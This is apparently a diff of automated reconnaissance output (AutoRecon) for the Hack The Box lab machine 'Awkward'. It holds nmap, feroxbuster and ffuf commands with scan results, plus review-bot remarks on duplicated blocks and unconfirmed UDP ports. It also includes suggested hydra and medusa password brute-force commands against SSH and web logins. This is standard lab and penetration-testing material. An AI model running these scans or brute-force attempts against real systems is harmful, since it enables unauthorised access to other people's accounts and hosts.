nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_quick_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml" hat-valley.htb
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/xml/tcp_22_ssh_nmap.xml" hat-valley.htb
feroxbuster -u http://hat-valley.htb:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://hat-valley.htb:80/.well-known/security.txt
curl -sSikf http://hat-valley.htb:80/robots.txt
curl -sSik http://hat-valley.htb:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/xml/tcp_80_http_nmap.xml" hat-valley.htb
curl -sk -o /dev/null -H "Host: huCKKYPfSgpWqvlEZXkR.hat-valley.htb" http://hat-valley.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://hat-valley.htb:80 2>&1
wkhtmltoimage --format png http://hat-valley.htb:80/ /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://hat-valley.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.hat-valley.htb" -fs 132 -noninteractive -s | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_hat-valley.htb_vhosts_subdomains-top1million-110000.txt"
```
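Review bot: The second half of this command log repeats the first half command for command; the only difference is the random Host header in the vhost baseline request (`EGBPgNKZlNXXTPPMQaVH` in the first copy, `huCKKYPfSgpWqvlEZXkR` in the second). That looks like two runs appended to the same file. Keep one run, or separate the runs with a timestamp so it is clear which results under `results/hat-valley.htb/scans/` belong to which.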

@@ -0,0 +1,67 @@
```bash
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://hat-valley.htb
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h hat-valley.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://hat-valley.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://hat-valley.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h hat-valley.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://hat-valley.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h hat-valley.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://hat-valley.htb:80 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://hat-valley.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://hat-valley.htb
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h hat-valley.htb
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://hat-valley.htb:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://hat-valley.htb/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h hat-valley.htb -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://hat-valley.htb/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h hat-valley.htb -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://hat-valley.htb:80 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://hat-valley.htb:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/awkward/results/hat-valley.htb/scans/tcp80/tcp_80_http_wpscan.txt"
```
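Review bot: The hydra and medusa lines under "Credential bruteforcing commands" still carry the generator's placeholders (`/path/to/auth/area`, `/path/to/login.php`, `invalid-login-message`), so this file is a list of tool suggestions and not a record of what was run against the host. State that in a header line or in the file name, and drop the second copy of the block, which is identical to the first.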

@@ -0,0 +1,8 @@
Matched Pattern: Powered-By: Express
Identified HTTP Server: nginx/1.18.0 (Ubuntu)
Matched Pattern: Powered-By: Express
Identified HTTP Server: nginx/1.18.0 (Ubuntu)

@@ -0,0 +1,70 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml" hat-valley.htb
```
[/home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt](file:///home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Feb 7 23:44:43 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/awkward/results/hat-valley.htb/scans/_full_tcp_nmap.txt -oX /home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_full_tcp_nmap.xml hat-valley.htb
adjust_timeouts2: packet supposedly had rtt of -426957 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -426957 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -432244 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -432244 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -434168 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -434168 microseconds. Ignoring time.
Nmap scan report for hat-valley.htb (10.10.11.185)
Host is up, received user-set (0.032s latency).
rDNS record for 10.10.11.185: awkward.htb
Scanned at 2023-02-07 23:44:44 CET for 56s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 7254afbaf6e2835941b7cd611c2f418b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCMaN1wQtPg5uk2w3xD0d0ND6JQgzw40PoqCSBDGB7Q0/f5lQSGU2eSTw4uCdL99hdM/+Uv84ffp2tNkCXyV8l8=
| 256 59365bba3c7821e326b37d23605aec38 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFsq9sSC1uhq5CBWylh+yiC7jz4tuegMj/4FVTp6bzZy
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Hat Valley
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 56BF0DDEA4641BFDDD743E1B04149554
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 2.6.32 (92%), Linux 5.0 - 5.3 (92%), Linux 3.1 (91%), Linux 3.2 (91%), Linux 5.0 (90%), Crestron XPanel control system (90%), Linux 5.0 - 5.4 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/7%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E2D494%P=x86_64-pc-linux-gnu)
SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)
SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=N)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 45.425 days (since Sat Dec 24 13:34:05 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 29.03 ms 10.10.16.1
2 52.62 ms awkward.htb (10.10.11.185)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 23:45:40 2023 -- 1 IP address (1 host up) scanned in 56.65 seconds
```

@@ -0,0 +1,53 @@
```bash
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml" hat-valley.htb
```
[/home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt](file:///home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt):
```
# Nmap 7.93 scan initiated Tue Feb 7 23:44:43 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/awkward/results/hat-valley.htb/scans/xml/_top_100_udp_nmap.xml hat-valley.htb
Warning: 10.10.11.185 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.10.11.185 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.10.11.185 from 200 to 400 due to 11 out of 13 dropped probes since last increase.
Increasing send delay for 10.10.11.185 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for hat-valley.htb (10.10.11.185)
Host is up, received user-set (0.040s latency).
rDNS record for 10.10.11.185: awkward.htb
Scanned at 2023-02-07 23:44:44 CET for 244s
Not shown: 87 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
17/udp open|filtered qotd no-response
19/udp open|filtered chargen no-response
68/udp open|filtered dhcpc no-response
136/udp open|filtered profile no-response
137/udp open|filtered netbios-ns no-response
999/udp open|filtered applix no-response
5000/udp open|filtered upnp no-response
5060/udp open|filtered sip no-response
5353/udp open|filtered zeroconf no-response
20031/udp open|filtered bakbonenetvault no-response
33281/udp open|filtered unknown no-response
49152/udp open|filtered unknown no-response
49186/udp open|filtered unknown no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/7%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63E2D550%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 518/udp)
HOP RTT ADDRESS
1 32.44 ms 10.10.16.1
2 32.45 ms awkward.htb (10.10.11.185)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 7 23:48:48 2023 -- 1 IP address (1 host up) scanned in 245.28 seconds
```
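Review bot: the Markdown link directly under the command fence points at file:///home/kali/htb/awkward/results/hat-valley.htb/scans/_top_100_udp_nmap.txt, an absolute path on the scanning workstation, so it will not resolve for anyone else who opens this repository. The same /home/kali prefix is hard-coded into the -oN and -oX arguments of the recorded command. Suggest linking relative to the repository (or dropping the link) and recording the command with relative output paths. Separately, every one of the 13 listed UDP ports is open|filtered with reason no-response, from a -T4 scan in which nmap raised the send delay to 800 after dropped probes and hit the retransmission cap, so the table does not confirm any listening UDP service. A one-line remark to that effect next to the output would keep later readers from treating these rows as findings.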

Some files were not shown because too many files have changed in this diff